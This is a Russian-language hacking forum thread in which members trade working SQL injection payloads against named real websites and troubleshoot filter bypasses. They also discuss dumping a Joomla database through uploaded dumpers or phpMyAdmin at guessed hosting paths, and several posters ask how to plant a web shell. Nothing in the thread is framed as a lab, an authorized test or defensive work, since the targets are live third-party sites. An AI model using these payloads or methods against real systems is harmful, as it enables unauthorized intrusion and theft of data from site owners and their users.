Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. none222

    none222 Guest

    Reputations:
    0
    попробуй
    Code:
    or 1 group by concat(version(),floor(rand(0)*2)) having min(0) or 1 -- 
     
  2. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    545
    Likes Received:
    159
    Reputations:
    324
    осутствует information_schema или не хватает пра для её просморта
     
  3. mff

    mff Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    2,074
    Likes Received:
    701
    Reputations:
    227
    Ребят, подскажите как слить базу данных jumla имея логин, пароль и имя базы? Хостинг Timeweb. :)
     
  4. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    попытаться найти sql-inject, если phpmyadmin на сайте не стоит
     
  5. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    1. Воспользоваться PhpMyAdmin. (вкладка Export).
    2. Залить дампер и слить базу (что-то типа Sypex Dumper и т.д.).
     
  6. CrystalTears

    CrystalTears Elder - Старейшина

    Joined:
    3 Sep 2006
    Messages:
    83
    Likes Received:
    47
    Reputations:
    11
    http://sypex.net/ ?
     
    #22586 CrystalTears, 9 Oct 2013
    Last edited: 9 Oct 2013
  7. mff

    mff Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    2,074
    Likes Received:
    701
    Reputations:
    227
    Я так и хотел сделать, но вот как узнать путь к phpmyadmin ?
     
  8. Sum.cogitans

    Sum.cogitans Elder - Старейшина

    Joined:
    7 Sep 2013
    Messages:
    173
    Likes Received:
    32
    Reputations:
    19
    Ну во-первых, если коннект к базе разрешен извне, можешь залить PhpMyAdmin на любой свой сервер, в конфиге вместо localhost прописать IP сайта / логин и пароль / авторизация http. Или через любые другие утилиты умеющие подключаться к MySQL.

    Если с удаленным подключением фейл, можно попробовать типовые пути, вдруг есть на сервере:

    1. В корне сайта и в каталоге admin если есть - /pma/, /phpmyadmin/, /myadmin/
    2. Те же варианты, только на субдомене - pma.site.com
    3. Если это хостинг на базе ISP (только прописывай именно IP а не доменное имя) - https://127.0.0.1/myadmin/
     
    #22588 Sum.cogitans, 9 Oct 2013
    Last edited: 9 Oct 2013
    1 person likes this.
  9. mff

    mff Elder - Старейшина

    Joined:
    12 Mar 2008
    Messages:
    2,074
    Likes Received:
    701
    Reputations:
    227
    Да, там у них в зависимости от тарифа, имена имеют вид: https://bitrix132.timeweb.ru/pma/index.php и так далее.
     
  10. Sum.cogitans

    Sum.cogitans Elder - Старейшина

    Joined:
    7 Sep 2013
    Messages:
    173
    Likes Received:
    32
    Reputations:
    19
    У timeweb в зоне субдомена логин или целая площадка? Если площадка возможно повезет:

    HTTP
    http://phoenix.timeweb.ru/phpMyAdmin/
    http://scorpius.timeweb.ru/phpMyAdmin/
    HTTPS
    https://phoenix.timeweb.ru/pma/
    https://scorpius.timeweb.ru/pma/
     
    #22590 Sum.cogitans, 9 Oct 2013
    Last edited: 9 Oct 2013
  11. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    545
    Likes Received:
    159
    Reputations:
    324
    могу редактировать несколько php файлов на сервере
    но к сожалению там ограничение в 500 символов кода
    подскажите как можно залить шелл??
     
  12. Always

    Always New Member

    Joined:
    8 Feb 2012
    Messages:
    72
    Likes Received:
    3
    Reputations:
    0
    делают такой зпрос
    'and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and'
    вывод:
    Duplicate column name '5.1.69'

    отправляю такой запрос
    'and(select+1+from(select+count(*),concat((select+table_name+from+information_schema.tables+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)='1/

    вывод:
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from(select+count(*),concat((select+table_name+from+information_schema.tables+li' at line 1

    в чем дело?
     
  13. wacky

    wacky Member

    Joined:
    30 Jan 2012
    Messages:
    42
    Likes Received:
    7
    Reputations:
    6
    В том, что твои "плюсы" отправляются напрямую в субд.

    2 Oxotnik, эвал без палива? Что еще, по-твоему мнению, "без палива"? с99/r57 в корне или, быть может, дефейс главной ресурса?
     
    #22593 wacky, 10 Oct 2013
    Last edited: 10 Oct 2013
  14. Always

    Always New Member

    Joined:
    8 Feb 2012
    Messages:
    72
    Likes Received:
    3
    Reputations:
    0
     
  15. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Code:
    http://elc.in.ua/study.php?id=8'
    Перекручивает всё .. зараза!
     
  16. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    919
    Reputations:
    862
    Тут фильтр на наличие самого слова Select в запросе.

    http://elc.in.ua/study.php?id=8+and+1=1+group+by+3+--+

    Ковыряю.
     
    _________________________
  17. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,035
    Likes Received:
    534
    Reputations:
    935
    http://elc.in.ua/study.php?id=8+or(1)group+by(concat(version(),0x00,floor(rand(0)*2)))having(min(0)or(1))
     
    _________________________
  18. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Thx! Ну как я и ожидал, что это Blind. Мужики, а эти можете глянуть
    Code:
    http://www.sport-trade.ru/out.php?id=9%27+union+select+1,2,3,4,5,6,7,8,9,10,11+--+
    http://www.mebi.us/out.php?id=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+
     
  19. Always

    Always New Member

    Joined:
    8 Feb 2012
    Messages:
    72
    Likes Received:
    3
    Reputations:
    0
    http://elc.in.ua/study.php?id=8%20and(select%201%20from(select%20count(*),concat((select%20table_name%20from%20information_schema.tables%20limit%2040,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)=1
    не могу дальше, ели грузит сайт! походу все накинулись со сканерами)
     
  20. zombak18

    zombak18 New Member

    Joined:
    2 Oct 2011
    Messages:
    34
    Likes Received:
    1
    Reputations:
    0
    В общем есть страничка.. boom.php?page=1&subcat= на который с ' выдает ошибку
    CALL failed: (1064) You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''',0,5)' at line 1

    Ничего не фильтрует наверно), как можно залить шелл или получить таблицы? Киньте пример мб..
     
    #22600 zombak18, 10 Oct 2013
    Last edited: 10 Oct 2013
Thread Status:
Not open for further replies.